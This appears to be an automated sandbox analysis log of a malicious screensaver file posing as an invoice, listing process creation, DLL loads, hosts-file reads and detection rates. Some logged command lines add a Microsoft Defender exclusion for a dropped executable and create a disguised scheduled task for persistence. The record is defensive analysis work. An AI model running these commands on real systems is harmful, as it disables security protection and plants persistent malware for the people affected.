          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: INV000001203.scrReversingLabs: Detection: 34%
          Source: INV000001203.scrVirustotal: Detection: 39%
          Source: C:\Users\user\Desktop\INV000001203.scrFile read: C:\Users\user\Desktop\INV000001203.scrJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\INV000001203.scr "C:\Users\user\Desktop\INV000001203.scr" /S
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp"
          Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {EDC565F7-D229-4A04-9F45-CF04A45A0510} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp8363.tmp"
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bZqCbFmlynN.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp8363.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: bcrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
          Source: C:\Users\user\Desktop\INV000001203.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\INV000001203.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: INV000001203.scrStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: INV000001203.scrStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: INV000001203.scrStatic PE information: section name: .text entropy: 7.775466800927758
          Source: bZqCbFmlynN.exe.0.drStatic PE information: section name: .text entropy: 7.775466800927758
          Source: C:\Users\user\Desktop\INV000001203.scrFile created: C:\Users\user\AppData\Roaming\bZqCbFmlynN.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\INV000001203.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bZqCbFmlynN" /XML "C:\Users\user\AppData\Local\Temp\tmp693F.tmp"
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV000001203.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
